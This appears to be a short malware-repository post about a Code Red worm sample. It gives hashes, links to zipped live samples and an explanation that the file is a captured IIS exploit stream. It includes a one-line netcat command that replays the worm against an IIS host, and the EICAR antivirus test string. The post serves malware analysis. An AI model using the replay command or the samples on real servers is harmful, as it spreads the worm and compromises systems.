
win_codered_a

info: 4039 Jul 16 2001 codered.exe
md5sum: 6f5767ec5a9cc6f7d195dde3c3939120 codered.exe
sha1sum: 4605a2d0aae8fa5ec0b72973bea928762cc6d002 codered.exe

Threat: CodeRed Worm
File: C:\malware\codered.exe
Date found: Tuesday, December 13, 2005 8:57:29 PM
A/V: http://www.f-secure.com/v-descs/bady.shtml

Links are broken.

Use this:

http://www.offensivecomputing.net/files/active/0/win_codered_a.zip
http://www.offensivecomputing.net/files/active/0/win_codered_a_strings.zip

Note: This is a TCP stream dump, not an .EXE

This isn't actually an MZ .exe or anything. It's the IIS Unicode buffer-overflow-whatever-explosion-thingy attack, which jumps into the following shellcode/wormcode. (I've lost track of all of the exploits surrounding IIS and Unicode.) eEye wrote up a pretty good analysis of this, if I remember. This one, and "Code Red ver.2". I'll paste the URLs here later to save people the trouble of looking it up.
Now that I think about it... eEye has samples of each worm up on their web site. And to my naked eye, I think that they're identical to this one. Only not named "codered.EXE".

By the way, I don't recommend that anyone do this, but if you need to revive this worm for testing/analysis, just do:

zcat win_codered_a.zip | nc iis.victim.com 80

--
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*